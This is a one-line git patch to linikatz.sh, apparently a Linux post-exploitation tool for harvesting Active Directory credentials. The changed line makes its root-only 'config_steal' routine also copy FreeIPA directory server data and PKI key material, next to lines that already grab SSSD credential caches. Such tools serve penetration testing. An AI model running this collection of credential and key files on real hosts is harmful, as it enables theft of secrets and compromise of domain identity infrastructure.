From ed6f5acbd7df804df18080f441d763f196d8536d Mon Sep 17 00:00:00 2001 From: Tim Brown Date: Tue, 3 Aug 2021 02:45:36 +0100 Subject: [PATCH] Improved IPA support, now grabs LDAP and PKI artefacts --- linikatz.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/linikatz.sh b/linikatz.sh index 8fe6579..c3ae915 100755 --- a/linikatz.sh +++ b/linikatz.sh @@ -302,7 +302,7 @@ do done header stdio_message_log "freeipa-check" "FreeIPA AD configuration" -[ "$(needs_root)" -eq 1 ] && config_steal /etc/ipa || stdio_message_warn "needs" "not running as root" +[ "$(needs_root)" -eq 1 ] && config_steal /var/lib/dirsrv /etc/dirsrv /etc/pki /etc/ipa || stdio_message_warn "needs" "not running as root" stdio_message_log "sss-check" "SSS AD configuration" [ "$(needs_root)" -eq 1 ] && config_steal /var/lib/sss /etc/sssd || stdio_message_warn "needs" "not running as root" stdio_message_log "vintella-check" "VAS AD configuration"